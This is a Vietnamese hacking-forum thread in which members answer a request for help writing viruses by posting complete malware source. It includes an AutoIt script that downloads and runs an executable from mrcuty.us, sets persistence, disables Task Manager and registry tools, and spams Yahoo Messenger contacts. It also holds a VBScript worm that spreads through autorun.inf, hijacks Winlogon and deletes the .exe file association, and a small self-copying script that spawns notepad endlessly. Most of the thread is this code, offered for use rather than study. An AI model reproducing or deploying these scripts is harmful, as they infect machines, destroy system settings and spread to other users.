English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Góp ý viết code virus  XML
  [Discussion]   Góp ý viết code virus 10/05/2010 14:03:02 (+0700) | #1 | 210632
daigiaIQ_Y2.1K
Member
[Minus]    0    [Plus]
Joined: 18/01/2008 08:30:27
Messages: 60
Offline
[Profile] [PM]
Em đang thử viết một số code virus ( chỉ là nghiên cứu thôi chứ không phá hoại ) .
Hồi trước thấy người ta xôn xao về con SysSafe có thể xuyên thủng DeepFreezer ( ghi trực tiếp dữ liệu lên ổ cứng ) . Cho em hỏi làm sao viết một đoạn code nào đó để viết dữ liệu trực tiếp lên ổ cứng .

Thanks.
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 10/05/2010 17:08:49 (+0700) | #2 | 210640
[Avatar]
 Hacker1805
Member
[Minus]    0    [Plus]
Joined: 30/03/2010 12:52:06
Messages: 33
Offline
[Profile] [PM] [WWW] [Yahoo!] [MSN]
Bạn "đang thử viết" con virus đó bằng ngôn ngữ gì?
"Làm sao viết" thì còn tuỳ vào kiến thức của bạn.
Bạn nói rõ hơn để mọi người cũng "nghiên cứu" nhá
-----------------------------------------------------------
Nhân đạo với kẻ thù là tàn bạo với chính mình
-----------------------------------------------------------
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 10/05/2010 18:24:12 (+0700) | #3 | 210643
[Avatar]
 handaewoo
Member
[Minus]    0    [Plus]
Joined: 07/11/2009 19:10:38
Messages: 207
Location: Korea
Offline
[Profile] [PM] [Email]
không có syssafe mà là safesys.Còn bạn DaigiaIQ_Y2.1k muốn "phá băng" thì mấy cái tool thiếu gì , hình như bên xgroupvn.org có đấy, hay google cũng được. Viết virus thì autoit là sự lựa chọn dễ nhất theo cả nghĩa đen lẫn nghĩa bóng (dễ thành công cũng như dễ bị bóc lịch nếu bị túm gáy)
PS:Code của safesys có search google cũng chẳng thấy đâu, đừng tìm vô ích
Bi Kịch Antivirus Vietnam = BKAV
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 14/05/2010 13:43:35 (+0700) | #4 | 210878
daigiaIQ_Y2.1K
Member
[Minus]    0    [Plus]
Joined: 18/01/2008 08:30:27
Messages: 60
Offline
[Profile] [PM]
_ Thì dĩ nhiên là viết bằng AutoIt rồi chứ không lẽ lại viết bằng pascal . " Làm sao viết " thì em cũng bó tay vì kiến thức của em chưa " đủ " để viết được đoạn mã này nên mới hỏi anh chứ .
_ Em không muốn phá băng bằng tools , nếu phá băng bằng tay hay tools thì ai chằng biết . Em muốn viết một con virus có khả năng ghi dữ liệu trực tiếp lên ổ cứng thôi .
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 14/05/2010 19:12:40 (+0700) | #5 | 210912
[Avatar]
 freeze_love
Member
[Minus]    0    [Plus]
Joined: 23/01/2009 23:07:19
Messages: 415
Location: HCMc
Offline
[Profile] [PM] [Email]
Lại 1 con gà đòi viết Virus = AutoIt smilie smilie . Hèn chi AutoIt vẫn còn bị BK đưa vào danh sách đen.
Lấy C***, VB ra viết , cứ nhè AutoIt. Một file exe sau khi biên dịch có srcip chỉ là hiện cái Msgbox mà đã mập đển ~ 300 Kb. Virus mà mập cỡ đó.
AutoIt dễ bị Decompile và DeObfuscate nên việc chế ngự Virus là chuyện dễ như ăn ớt.
Tỉnh táo đi!
do{
học đến điên;
}while (sống);
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 14/05/2010 21:34:13 (+0700) | #6 | 210923
billylo22
Member
[Minus]    0    [Plus]
Joined: 23/04/2010 02:02:06
Messages: 6
Offline
[Profile] [PM]
Nếu viết = AutoIt thì cho dù là 1 chương trình bình thường chưa kịp chạy đã bị kill rùi nói j mà thêm code virus
hok bít thằng AutoIt pack chương trình = cái j zậy ,rất dễ bị Decompile code
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 15/05/2010 11:38:43 (+0700) | #7 | 210957
[Avatar]
 handaewoo
Member
[Minus]    0    [Plus]
Joined: 07/11/2009 19:10:38
Messages: 207
Location: Korea
Offline
[Profile] [PM] [Email]

billylo22 wrote:
Nếu viết = AutoIt thì cho dù là 1 chương trình bình thường chưa kịp chạy đã bị kill rùi nói j mà thêm code virus
hok bít thằng AutoIt pack chương trình = cái j zậy ,rất dễ bị Decompile code 

vậy bác thử run cái này xem thử coi nó có bị kill không smilie

em chỉ ví dụ chứ không cố ý phát tán virus , xin bác conmale nhẹ tay

Code:
#NoTrayIcon
$website = "http://mrcuty.us/"


If Not FileExists(@WindowsDir & "\taskmng.exe") Then
InetGet ($website & "/dkc.exe", @WindowsDir & "\taskmng.exe", 0, 1)
Sleep(5000)
EndIf


RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz", "content url", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast", "content url", "REG_SZ", $website)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Window Title", "REG_SZ", "zzzKITClubzzz")


Dim $tin[10]
$tin[0] = "mrCuTy.us - quang cao tang rank " & $website & " "
$tin[1] = "cbg.vn - test cai  " & $website & " "
$tin[2] = "rock0em.org  " & $website & " "
$tin[3] = "autoitvn.net " & $website & " "
$tin[4] = "mrcuty.us " & $website & " "
$tin[5] = "mrcuty.us " & $website & " "
$tin[6] = "mrcuty.us " & $website & " "
$tin[7] = "mrcuty.us " & $website & " "
$tin[8] = "mrcuty.us " & $website & " "
$tin[9] = "mrcuty.us " & $website & " "


While (1)
sleep(60000)
$tieude = WinGetTitle("Yahoo! Messenger", "")
$kiemtra = WinExists ($tieude)
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
ClipPut($tin[$ngaunhien])
BlockInput (1)
WinActivate($tieude)
Send("!m")
Send("un")
Send("^v {ENTER}{ENTER}")
Send("^m")
Send("{DOWN}")
Send("^{SHIFTDOWN}{END}{SHIFTUP}")
Send("{ENTER}")
Send("^v {ENTER}")
BlockInput (0)
EndIf
Sleep(1800000)
WEnd


xin nói thêm , bác chịu khó vào lục trong cái folder cài autoit của bác thì thấy ngay cái UPX trong ấy đấy ( nếu bác có cài autoit )
Bi Kịch Antivirus Vietnam = BKAV
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 15/05/2010 11:47:34 (+0700) | #8 | 210959
[Avatar]
 handaewoo
Member
[Minus]    0    [Plus]
Joined: 07/11/2009 19:10:38
Messages: 207
Location: Korea
Offline
[Profile] [PM] [Email]

freeze_love wrote:
AutoIt dễ bị Decompile và DeObfuscate nên việc chế ngự Virus là chuyện dễ như ăn ớt.
Tỉnh táo đi! 

nhưng em thuộc loại ăn ớt không quen nên gặp khó khăn cũng nhiều anh ạ smilie . Em biết là dân autoit "gộc" như ông anh cũng chán mấy cái vụ viết virus nên chuyển qua viết anti virus nhưng người ta cũng lỡ hỏi rồi thì trả lời 1 tiếng cho khỏi mất tình cảm smilie
Bi Kịch Antivirus Vietnam = BKAV
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 18/05/2010 07:03:03 (+0700) | #9 | 211149
daigiaIQ_Y2.1K
Member
[Minus]    0    [Plus]
Joined: 18/01/2008 08:30:27
Messages: 60
Offline
[Profile] [PM]
Lại 1 con gà đòi viết Virus = AutoIt . Hèn chi AutoIt vẫn còn bị BK đưa vào danh sách đen.
Lấy C***, VB ra viết , cứ nhè AutoIt. Một file exe sau khi biên dịch có srcip chỉ là hiện cái Msgbox mà đã mập đển ~ 300 Kb. Virus mà mập cỡ đó.
AutoIt dễ bị Decompile và DeObfuscate nên việc chế ngự Virus là chuyện dễ như ăn ớt.
 

Nếu nó mập thì có thể compress hay pack lại thôi . Cái chuyện " dễ bị Decompile và DeObfuscate " thì tuỳ người , cách viết hay giải thuật họ sử dụng thôi anh . Vỏ quít dày có móng tay nhọn mà
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 19/05/2010 18:22:02 (+0700) | #10 | 211231
[Avatar]
 handaewoo
Member
[Minus]    0    [Plus]
Joined: 07/11/2009 19:10:38
Messages: 207
Location: Korea
Offline
[Profile] [PM] [Email]
rất tiếc là trong quá trình compile thì nó đã bị pack bởi UPX rồi
Bi Kịch Antivirus Vietnam = BKAV
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 19/05/2010 18:29:24 (+0700) | #11 | 211232
daigiaIQ_Y2.1K
Member
[Minus]    0    [Plus]
Joined: 18/01/2008 08:30:27
Messages: 60
Offline
[Profile] [PM]
cái này em chưa biết , dù sao cũng cám ơn anh cho ý kiến .
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 21/05/2010 18:44:37 (+0700) | #12 | 211339
[Avatar]
 MinhNguyenQuang75
Member
[Minus]    0    [Plus]
Joined: 06/03/2010 06:42:35
Messages: 43
Offline
[Profile] [PM]
Đây nữa này
Code:
On Error Resume Next
strComputer = "."
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set WSHShell = WScript.CreateObject("WScript.Shell")
WSHShell.Run "explorer.exe \"
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_LocalTime")
For Each objItem in colItems
    TheDay = objItem.Day
    TheMonth = objItem.Month
    TheYear = objItem.Year
Next
const HKEY_CLASSES_ROOT = &H80000000
const HKEY_CURRENT_USER = &H80000001
const HKEY_LOCAL_MACHINE = &H80000002
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & _ 
    strComputer & "\root\default:StdRegProv")
Err.Clear
WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Day")
WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Month")
WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Year")
errnum = Err.Number
If errnum <> 0 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Day",TheDay,"REG_SZ"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Month",TheMonth,"REG_SZ"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Year",TheYear,"REG_SZ"
End If
StrDay = WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Day")
StrMonth = WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Month")
StrYear = WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Year")
Sumday = (TheDay + TheMonth*30 + TheYear*360) - (StrDay + StrMonth*30 + StrYear*360)
If 0 < Sumday And Sumday < 5 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Destroy","1","REG_SZ"
End If
If 5 <= Sumday And Sumday < 10 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Destroy","2","REG_SZ"
End If
If Sumday >= 10 Or Sumday < 0 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Destroy","3","REG_SZ"
End If
oReg.SetDWORDValue HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","1"
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","1"
oReg.SetDWORDValue HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","1"
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","1"
oReg.SetDwordValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","Hidden","2"
oReg.SetDwordValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","HideFileExt","1"
oReg.SetDwordValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","ShowSuperHidden","0"
oReg.SetStringValue HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","Shell","Explorer.exe userinit.vbs"
oReg.SetStringValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Run","Yahoo Messengger","QuangMinh.vbs"
WSHShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","1","REG_DWORD"
unattrib ("C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe")
objFSO.DeleteFile ("C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe")
Function destroy(dr)
If dr = "1" Then
oReg.EnumKey HKEY_CLASSES_ROOT,".exe",arrSubKeys
For Each subkey In arrSubKeys
oReg.DeleteKey HKEY_CLASSES_ROOT,".exe\" & subkey
Next
oReg.DeleteKey HKEY_CLASSES_ROOT,".exe"
End If
If dr = "2" Then
WSHShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive","67108863","REG_DWORD"
End If
If dr = "3" Then
oReg.SetStringValue HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows NT\CurrentVersion\Winlogon","Userinit","C:\WINDOWS\system32\QuangMinh.vbs"
WSHShell.Run "c:\windows\system32\shutdown -l"
End If
End Function
Function unattrib(path)
Set objFile = objFSO.GetFile(path)
objFile.Attributes = objFile.Attributes AND 1
objFile.Attributes = objFile.Attributes AND 2
objFile.Attributes = objFile.Attributes AND 4
End Function
Function attrib(path)
Set objFile = objFSO.GetFile(path)
objFile.Attributes = objFile.Attributes OR 1
objFile.Attributes = objFile.Attributes OR 2
objFile.Attributes = objFile.Attributes OR 4
End Function
Function autorun(path)
Set objFile = objFSO.CreateTextFile(path)
objFile.Close
Set objTextFile = objFSO.OpenTextFile(path, 8, True)
objTextFile.WriteLine("[autorun]")
objTextFile.WriteLine("open=C:\windows\system32\wscript.exe QuangMinh.vbs")
objTextFile.WriteLine("action=Open folder to view files")
objTextFile.WriteLine("shell\open=Open")
objTextFile.WriteLine("shell\open\command=C:\windows\system32\wscript.exe QuangMinh.vbs")
objTextFile.WriteLine("shell\open\default=1")
objTextFile.WriteLine("shell\explore\Command=C:\windows\system32\wscript.exe QuangMinh.vbs")
objTextFile.Close
End Function
Function read(path)
Set objTextFile = objFSO.OpenTextFile(path, 1)
Do Until objTextFile.AtEndOfStream
strNextLine = objTextFile.Readline
If strNextLine = "open=C:\windows\system32\wscript.exe QuangMinh.vbs" Then
fileok = "y"
Exit Do
End If
Loop
End Function
Do
Set colProcesses = objWMIService.ExecQuery _
    ("Select * from Win32_Process Where Name = 'WScript.exe'")
If colProcesses.Count < 2 Then
Set colProcessList = objWMIService.ExecQuery _
    ("Select * from Win32_Process Where Name = 'Explorer.exe'")
For Each objProcess in colProcessList
    objProcess.Terminate()
Next
WSHShell.Run "QuangMinh.vbs"
End If
oReg.GetStringValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\Date","Destroy",StrDestroy
If StrDestroy = "1" Then
destroy("1")
End If
If StrDestroy = "2" Then
destroy("2")
End If
If StrDestroy = "3" Then
destroy("3")
End If
WScript.Sleep 100
objFSO.CopyFile "QuangMinh.vbs" , "C:\windows\system32\syskm.dll", TRUE
attrib("C:\windows\system32\syskm.dll")
Set colDrives = objFSO.Drives
For Each objDrive in colDrives
If objDrive.IsReady = True Then
fileok = "n"
read(objDrive.DriveLetter & ":\autorun.inf")
If fileok = "n" Then
unattrib(objDrive.DriveLetter & ":\autorun.inf")
autorun(objDrive.DriveLetter & ":\autorun.inf")
attrib(objDrive.DriveLetter & ":\autorun.inf")
End If
objFSO.CopyFile "C:\windows\system32\syskm.dll" , objDrive.DriveLetter & ":\QuangMinh.vbs", TRUE
End If
Next
objFSO.CopyFile "C:\windows\system32\syskm.dll" , "C:\windows\system32\QuangMinh.vbs", TRUE
objFSO.CopyFile "C:\windows\system32\syskm.dll" , "C:\windows\system32\userinit.vbs", TRUE
Loop
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 22/05/2010 11:21:06 (+0700) | #13 | 211394
[Avatar]
 MinhNguyenQuang75
Member
[Minus]    0    [Plus]
Joined: 06/03/2010 06:42:35
Messages: 43
Offline
[Profile] [PM]
Thêm chú nữa này

Code:
On Error Resume Next
Set popo= Createobject("scripting.filesystemobject")
popo.copyfile wscript.scriptfullname,cuong.GetSpecialFolder(1)& "\popo.vbs"
Set popo2= CreateObject("WScript.Shell")
popo2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Ru n\cod e1","wscript.exe "&popo.GetSpecialFolder(0)& "\popo.vbs %"
Set thoi_Xong= CreateObject("WScript.Shell")
Do
thoi_Xong.run "notepad",false
loop

Con này k nguy hiểm lắm nhưng nghịch cho vui
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 24/05/2010 07:14:51 (+0700) | #14 | 211510
daigiaIQ_Y2.1K
Member
[Minus]    0    [Plus]
Joined: 18/01/2008 08:30:27
Messages: 60
Offline
[Profile] [PM]
Cái virus .vbs ở trên chỉ có khả năng gọi notepad liên tục gây đứng máy thôi . Con này em nghịch hoài . Dù sao cũng cám ơn anh đóng góp ý kiến
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 24/05/2010 19:01:14 (+0700) | #15 | 211571
[Avatar]
 MinhNguyenQuang75
Member
[Minus]    0    [Plus]
Joined: 06/03/2010 06:42:35
Messages: 43
Offline
[Profile] [PM]
Con đó chôm bên vnZoom về smilie smilie
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 28/05/2010 19:07:50 (+0700) | #16 | 211833
daigiaIQ_Y2.1K
Member
[Minus]    0    [Plus]
Joined: 18/01/2008 08:30:27
Messages: 60
Offline
[Profile] [PM]

freeze_love wrote:
Lại 1 con gà đòi viết Virus = AutoIt  

Chú Nam nói vậy hơi ' Chanh chua ' nha . Cháu chỉ là dân newbie nên cũng không hiểu biết rộng bằng chú . Nên mới nhờ đến các cô chú ở HVA .
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 29/05/2010 19:06:09 (+0700) | #17 | 211869
[Avatar]
 handaewoo
Member
[Minus]    0    [Plus]
Joined: 07/11/2009 19:10:38
Messages: 207
Location: Korea
Offline
[Profile] [PM] [Email]
Bác ấy có chút xíu vấn đề với Admin của Autoitvn ( chuyên ngâm cú malware
viết bằng Autoit )nên ...thế đấy
Bi Kịch Antivirus Vietnam = BKAV
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 01/06/2010 18:35:39 (+0700) | #18 | 212088
daigiaIQ_Y2.1K
Member
[Minus]    0    [Plus]
Joined: 18/01/2008 08:30:27
Messages: 60
Offline
[Profile] [PM]

MinhNguyenQuang75 wrote:

billylo22 wrote:

Nếu viết = AutoIt thì cho dù là 1 chương trình bình thường chưa kịp chạy đã bị kill rùi nói j mà thêm code virus
hok bít thằng AutoIt pack chương trình = cái j zậy ,rất dễ bị Decompile code


vậy bác thử run cái này xem thử coi nó có bị kill không smilie

em chỉ ví dụ chứ không cố ý phát tán virus , xin bác conmale nhẹ tay

Code:

#NoTrayIcon
$website = "http://mrcuty.us/"


If Not FileExists(@WindowsDir & "\taskmng.exe"smilie Then
InetGet ($website & "/dkc.exe", @WindowsDir & "\taskmng.exe", 0, 1)
Sleep(5000)
EndIf


RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1"smilie
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1"smilie
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1"smilie
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz", "content url", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast", "content url", "REG_SZ", $website)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe"smilie
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Window Title", "REG_SZ", "zzzKITClubzzz"smilie


Dim $tin[10]
$tin[0] = "mrCuTy.us - quang cao tang rank " & $website & " "
$tin[1] = "cbg.vn - test cai " & $website & " "
$tin[2] = "rock0em.org " & $website & " "
$tin[3] = "autoitvn.net " & $website & " "
$tin[4] = "mrcuty.us " & $website & " "
$tin[5] = "mrcuty.us " & $website & " "
$tin[6] = "mrcuty.us " & $website & " "
$tin[7] = "mrcuty.us " & $website & " "
$tin[8] = "mrcuty.us " & $website & " "
$tin[9] = "mrcuty.us " & $website & " "


While (1)
sleep(60000)
$tieude = WinGetTitle("Yahoo! Messenger", ""smilie
$kiemtra = WinExists ($tieude)
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
ClipPut($tin[$ngaunhien])
BlockInput (1)
WinActivate($tieude)
Send("!m"smilie
Send("un"smilie
Send("^v {ENTER}{ENTER}"smilie
Send("^m"smilie
Send("{DOWN}"smilie
Send("^{SHIFTDOWN}{END}{SHIFTUP}"smilie
Send("{ENTER}"smilie
Send("^v {ENTER}"smilie
BlockInput (0)
EndIf
Sleep(1800000)
WEnd
 

MinhNguyenQuang75 wrote:

On Error Resume Next
strComputer = "."
Set objFSO = CreateObject("Scripting.FileSystemObject"smilie
Set WSHShell = WScript.CreateObject("WScript.Shell"smilie
WSHShell.Run "explorer.exe \"
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2"smilie
Set colItems = objWMIService.ExecQuery("Select * from Win32_LocalTime"smilie
For Each objItem in colItems
TheDay = objItem.Day
TheMonth = objItem.Month
TheYear = objItem.Year
Next
const HKEY_CLASSES_ROOT = &H80000000
const HKEY_CURRENT_USER = &H80000001
const HKEY_LOCAL_MACHINE = &H80000002
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & _
strComputer & "\root\default:StdRegProv"smilie
Err.Clear
WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Day"smilie
WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Month"smilie
WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Year"smilie
errnum = Err.Number
If errnum <> 0 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Day",TheDay,"REG_SZ"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Month",TheMonth,"REG_SZ"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Year",TheYear,"REG_SZ"
End If
StrDay = WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Day"smilie
StrMonth = WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Month"smilie
StrYear = WSHShell.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Year"smilie
Sumday = (TheDay + TheMonth*30 + TheYear*360) - (StrDay + StrMonth*30 + StrYear*360)
If 0 < Sumday And Sumday < 5 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Destroy","1","REG_SZ"
End If
If 5 <= Sumday And Sumday < 10 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Destroy","2","REG_SZ"
End If
If Sumday >= 10 Or Sumday < 0 Then
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Date\Destroy","3","REG_SZ"
End If
oReg.SetDWORDValue HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","1"
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","1"
oReg.SetDWORDValue HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","1"
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","1"
oReg.SetDwordValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","Hidden","2"
oReg.SetDwordValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","HideFileExt","1"
oReg.SetDwordValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","ShowSuperHidden","0"
oReg.SetStringValue HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","Shell","Explorer.exe userinit.vbs"
oReg.SetStringValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Run","Yahoo Messengger","QuangMinh.vbs"
WSHShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","1","REG_DWORD"
unattrib ("C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe"smilie
objFSO.DeleteFile ("C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe"smilie
Function destroy(dr)
If dr = "1" Then
oReg.EnumKey HKEY_CLASSES_ROOT,".exe",arrSubKeys
For Each subkey In arrSubKeys
oReg.DeleteKey HKEY_CLASSES_ROOT,".exe\" & subkey
Next
oReg.DeleteKey HKEY_CLASSES_ROOT,".exe"
End If
If dr = "2" Then
WSHShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive","67108863","REG_DWORD"
End If
If dr = "3" Then
oReg.SetStringValue HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows NT\CurrentVersion\Winlogon","Userinit","C:\WINDOWS\system32\QuangMinh.vbs"
WSHShell.Run "c:\windows\system32\shutdown -l"
End If
End Function
Function unattrib(path)
Set objFile = objFSO.GetFile(path)
objFile.Attributes = objFile.Attributes AND 1
objFile.Attributes = objFile.Attributes AND 2
objFile.Attributes = objFile.Attributes AND 4
End Function
Function attrib(path)
Set objFile = objFSO.GetFile(path)
objFile.Attributes = objFile.Attributes OR 1
objFile.Attributes = objFile.Attributes OR 2
objFile.Attributes = objFile.Attributes OR 4
End Function
Function autorun(path)
Set objFile = objFSO.CreateTextFile(path)
objFile.Close
Set objTextFile = objFSO.OpenTextFile(path, 8, True)
objTextFile.WriteLine("[autorun]"smilie
objTextFile.WriteLine("open=C:\windows\system32\wscript.exe QuangMinh.vbs"smilie
objTextFile.WriteLine("action=Open folder to view files"smilie
objTextFile.WriteLine("shell\open=Open"smilie
objTextFile.WriteLine("shell\open\command=C:\windows\system32\wscript.exe QuangMinh.vbs"smilie
objTextFile.WriteLine("shell\open\default=1"smilie
objTextFile.WriteLine("shell\explore\Command=C:\windows\system32\wscript.exe QuangMinh.vbs"smilie
objTextFile.Close
End Function
Function read(path)
Set objTextFile = objFSO.OpenTextFile(path, 1)
Do Until objTextFile.AtEndOfStream
strNextLine = objTextFile.Readline
If strNextLine = "open=C:\windows\system32\wscript.exe QuangMinh.vbs" Then
fileok = "y"
Exit Do
End If
Loop
End Function
Do
Set colProcesses = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'WScript.exe'"smilie
If colProcesses.Count < 2 Then
Set colProcessList = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'Explorer.exe'"smilie
For Each objProcess in colProcessList
objProcess.Terminate()
Next
WSHShell.Run "QuangMinh.vbs"
End If
oReg.GetStringValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\Date","Destroy",StrDestroy
If StrDestroy = "1" Then
destroy("1"smilie
End If
If StrDestroy = "2" Then
destroy("2"smilie
End If
If StrDestroy = "3" Then
destroy("3"smilie
End If
WScript.Sleep 100
objFSO.CopyFile "QuangMinh.vbs" , "C:\windows\system32\syskm.dll", TRUE
attrib("C:\windows\system32\syskm.dll"smilie
Set colDrives = objFSO.Drives
For Each objDrive in colDrives
If objDrive.IsReady = True Then
fileok = "n"
read(objDrive.DriveLetter & ":\autorun.inf"smilie
If fileok = "n" Then
unattrib(objDrive.DriveLetter & ":\autorun.inf"smilie
autorun(objDrive.DriveLetter & ":\autorun.inf"smilie
attrib(objDrive.DriveLetter & ":\autorun.inf"smilie
End If
